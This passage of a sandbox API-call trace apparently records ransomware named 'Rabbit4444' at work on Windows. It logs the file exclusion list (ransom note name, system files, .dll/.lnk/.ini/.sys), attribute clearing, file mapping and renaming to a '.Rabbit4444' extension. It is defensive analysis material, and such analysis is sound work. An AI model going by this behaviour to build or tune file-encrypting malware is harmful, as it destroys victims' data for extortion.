QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.498] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14780830966) returned 1 [0056.498] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1047) returned 1 [0056.498] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0056.498] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0056.498] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x720, lpName=0x0) returned 0x298 [0056.499] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x720) returned 0x70000 [0056.500] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.500] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0056.500] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.500] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0056.500] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.500] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0056.500] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.500] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0056.500] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14781075287) returned 1 [0056.500] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0056.500] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0056.500] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.500] CloseHandle (hObject=0x298) returned 1 [0056.500] CloseHandle (hObject=0x278) returned 1 [0056.500] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageActivate.settingcontent-ms.Rabbit4444") returned 170 [0056.501] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageActivate.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageactivate.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageActivate.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageactivate.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.501] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf746e133, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf746e133, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x2398fe3f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x42b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageAppsDefaults.settingcontent-ms", cAlternateFileName="AA91CC~1.SET")) returned 1 [0056.501] lstrcmpiW (lpString1="AAA_SettingsPageAppsDefaults.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.501] lstrcmpiW (lpString1="AAA_SettingsPageAppsDefaults.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.501] lstrcmpiW (lpString1="AAA_SettingsPageAppsDefaults.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.501] lstrcmpiW (lpString1="AAA_SettingsPageAppsDefaults.settingcontent-ms", lpString2=".") returned 1 [0056.501] lstrcmpiW (lpString1="AAA_SettingsPageAppsDefaults.settingcontent-ms", lpString2="..") returned 1 [0056.501] lstrcmpiW (lpString1="AAA_SettingsPageAppsDefaults.settingcontent-ms", lpString2="windows") returned -1 [0056.501] lstrcmpiW (lpString1="AAA_SettingsPageAppsDefaults.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.501] lstrcmpiW (lpString1="AAA_SettingsPageAppsDefaults.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.501] lstrcmpiW (lpString1="AAA_SettingsPageAppsDefaults.settingcontent-ms", lpString2="boot") returned -1 [0056.501] lstrcmpiW (lpString1="AAA_SettingsPageAppsDefaults.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.501] lstrcmpiW (lpString1="AAA_SettingsPageAppsDefaults.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.501] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageAppsDefaults.settingcontent-ms" | out: lpString1="AAA_SettingsPageAppsDefaults.settingcontent-ms") returned="AAA_SettingsPageAppsDefaults.settingcontent-ms" [0056.501] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAppsDefaults.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.502] lstrlenW (lpString="AAA_SettingsPageAppsDefaults.settingcontent-ms") returned 46 [0056.502] lstrlenW (lpString="Rabbit4444") returned 10 [0056.502] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.502] lstrlenW (lpString=".dll") returned 4 [0056.502] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.502] lstrlenW (lpString=".lnk") returned 4 [0056.502] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.502] lstrlenW (lpString=".ini") returned 4 [0056.502] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.502] lstrlenW (lpString=".sys") returned 4 [0056.502] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.502] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAppsDefaults.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageappsdefaults.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.502] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.502] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14781300236) returned 1 [0056.502] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1067) returned 1 [0056.502] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0056.502] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0056.502] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x730, lpName=0x0) returned 0x298 [0056.504] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x730) returned 0x70000 [0056.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0056.505] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0056.505] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.506] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0056.506] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.506] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0056.506] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14781649412) returned 1 [0056.506] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0056.506] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0056.506] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.506] CloseHandle (hObject=0x298) returned 1 [0056.506] CloseHandle (hObject=0x278) returned 1 [0056.506] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAppsDefaults.settingcontent-ms.Rabbit4444") returned 174 [0056.506] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAppsDefaults.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageappsdefaults.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAppsDefaults.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageappsdefaults.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.507] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf75c56b7, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf75c56b7, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x238ab028, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4ea, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageAppsDefaultsFileExtensionView.settingcontent-ms", cAlternateFileName="AA86F6~1.SET")) returned 1 [0056.507] lstrcmpiW (lpString1="AAA_SettingsPageAppsDefaultsFileExtensionView.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.507] lstrcmpiW (lpString1="AAA_SettingsPageAppsDefaultsFileExtensionView.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.507] lstrcmpiW (lpString1="AAA_SettingsPageAppsDefaultsFileExtensionView.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.507] lstrcmpiW (lpString1="AAA_SettingsPageAppsDefaultsFileExtensionView.settingcontent-ms", lpString2=".") returned 1 [0056.508] lstrcmpiW (lpString1="AAA_SettingsPageAppsDefaultsFileExtensionView.settingcontent-ms", lpString2="..") returned 1 [0056.508] lstrcmpiW (lpString1="AAA_SettingsPageAppsDefaultsFileExtensionView.settingcontent-ms", lpString2="windows") returned -1 [0056.508] lstrcmpiW (lpString1="AAA_SettingsPageAppsDefaultsFileExtensionView.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.508] lstrcmpiW (lpString1="AAA_SettingsPageAppsDefaultsFileExtensionView.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.508] lstrcmpiW (lpString1="AAA_SettingsPageAppsDefaultsFileExtensionView.settingcontent-ms", lpString2="boot") returned -1 [0056.508] lstrcmpiW (lpString1="AAA_SettingsPageAppsDefaultsFileExtensionView.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.508] lstrcmpiW (lpString1="AAA_SettingsPageAppsDefaultsFileExtensionView.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.508] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageAppsDefaultsFileExtensionView.settingcontent-ms" | out: lpString1="AAA_SettingsPageAppsDefaultsFileExtensionView.settingcontent-ms") returned="AAA_SettingsPageAppsDefaultsFileExtensionView.settingcontent-ms" [0056.508] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAppsDefaultsFileExtensionView.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.508] lstrlenW (lpString="AAA_SettingsPageAppsDefaultsFileExtensionView.settingcontent-ms") returned 63 [0056.508] lstrlenW (lpString="Rabbit4444") returned 10 [0056.508] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.508] lstrlenW (lpString=".dll") returned 4 [0056.508] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.508] lstrlenW (lpString=".lnk") returned 4 [0056.508] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.508] lstrlenW (lpString=".ini") returned 4 [0056.508] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.508] lstrlenW (lpString=".sys") returned 4 [0056.508] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.508] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAppsDefaultsFileExtensionView.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageappsdefaultsfileextensionview.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.509] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.509] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14781939981) returned 1 [0056.509] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1258) returned 1 [0056.509] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0056.509] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0056.509] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7f0, lpName=0x0) returned 0x298 [0056.510] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7f0) returned 0x70000 [0056.511] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.511] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0056.511] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.511] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0056.511] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.511] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0056.511] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.511] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0056.511] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14782207850) returned 1 [0056.511] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0056.511] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0056.511] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.512] CloseHandle (hObject=0x298) returned 1 [0056.512] CloseHandle (hObject=0x278) returned 1 [0056.512] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAppsDefaultsFileExtensionView.settingcontent-ms.Rabbit4444") returned 191 [0056.512] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAppsDefaultsFileExtensionView.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageappsdefaultsfileextensionview.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAppsDefaultsFileExtensionView.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageappsdefaultsfileextensionview.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.512] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf789a333, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf789a333, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x2394398e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4d1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageAppsDefaultsProtocolView.settingcontent-ms", cAlternateFileName="AA13B2~1.SET")) returned 1 [0056.512] lstrcmpiW (lpString1="AAA_SettingsPageAppsDefaultsProtocolView.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.512] lstrcmpiW (lpString1="AAA_SettingsPageAppsDefaultsProtocolView.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.512] lstrcmpiW (lpString1="AAA_SettingsPageAppsDefaultsProtocolView.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.513] lstrcmpiW (lpString1="AAA_SettingsPageAppsDefaultsProtocolView.settingcontent-ms", lpString2=".") returned 1 [0056.513] lstrcmpiW (lpString1="AAA_SettingsPageAppsDefaultsProtocolView.settingcontent-ms", lpString2="..") returned 1 [0056.513] lstrcmpiW (lpString1="AAA_SettingsPageAppsDefaultsProtocolView.settingcontent-ms", lpString2="windows") returned -1 [0056.513] lstrcmpiW (lpString1="AAA_SettingsPageAppsDefaultsProtocolView.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.513] lstrcmpiW (lpString1="AAA_SettingsPageAppsDefaultsProtocolView.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.513] lstrcmpiW (lpString1="AAA_SettingsPageAppsDefaultsProtocolView.settingcontent-ms", lpString2="boot") returned -1 [0056.513] lstrcmpiW (lpString1="AAA_SettingsPageAppsDefaultsProtocolView.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.513] lstrcmpiW (lpString1="AAA_SettingsPageAppsDefaultsProtocolView.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.513] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageAppsDefaultsProtocolView.settingcontent-ms" | out: lpString1="AAA_SettingsPageAppsDefaultsProtocolView.settingcontent-ms") returned="AAA_SettingsPageAppsDefaultsProtocolView.settingcontent-ms" [0056.513] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAppsDefaultsProtocolView.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.513] lstrlenW (lpString="AAA_SettingsPageAppsDefaultsProtocolView.settingcontent-ms") returned 58 [0056.513] lstrlenW (lpString="Rabbit4444") returned 10 [0056.513] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.513] lstrlenW (lpString=".dll") returned 4 [0056.513] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.513] lstrlenW (lpString=".lnk") returned 4 [0056.513] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.513] lstrlenW (lpString=".ini") returned 4 [0056.513] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.513] lstrlenW (lpString=".sys") returned 4 [0056.513] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.513] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAppsDefaultsProtocolView.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageappsdefaultsprotocolview.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.514] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.514] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14782444953) returned 1 [0056.514] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1233) returned 1 [0056.514] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0056.514] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0056.514] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e0, lpName=0x0) returned 0x298 [0056.515] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e0) returned 0x70000 [0056.516] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.516] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0056.516] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.516] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0056.516] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.516] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0056.516] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.516] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0056.516] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14782707066) returned 1 [0056.516] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0056.516] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0056.516] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.517] CloseHandle (hObject=0x298) returned 1 [0056.517] CloseHandle (hObject=0x278) returned 1 [0056.517] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAppsDefaultsProtocolView.settingcontent-ms.Rabbit4444") returned 186 [0056.517] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAppsDefaultsProtocolView.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageappsdefaultsprotocolview.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageAppsDefaultsProtocolView.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageappsdefaultsprotocolview.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.517] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7a3ddc5, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf7a3ddc5, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x2391d733, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x444, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageAppsNotifications.settingcontent-ms", cAlternateFileName="AAF9A5~1.SET")) returned 1 [0056.517] lstrcmpiW (lpString1="AAA_SettingsPageAppsNotifications.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.517] lstrcmpiW (lpString1="AAA_SettingsPageAppsNotifications.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.518] lstrcmpiW (lpString1="AAA_SettingsPageAppsNotifications.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.518] lstrcmpiW (lpString1="AAA_SettingsPageAppsNotifications.settingcontent-ms", lpString2=".") returned 1 [0056.518] lstrcmpiW (lpString1="AAA_SettingsPageAppsNotifications.settingcontent-ms", lpString2="..") returned 1 [0056.518] lstrcmpiW (lpString1="AAA_SettingsPageAppsNotifications.settingcontent-ms", lpString2="windows") returned -1 [0056.518] lstrcmpiW (lpString1="AAA_SettingsPageAppsNotifications.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.518] lstrcmpiW (lpString1="AAA_SettingsPageAppsNotifications.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.518] lstrcmpiW (lpString1="AAA_SettingsPageAppsNotifications.settingcontent-ms", 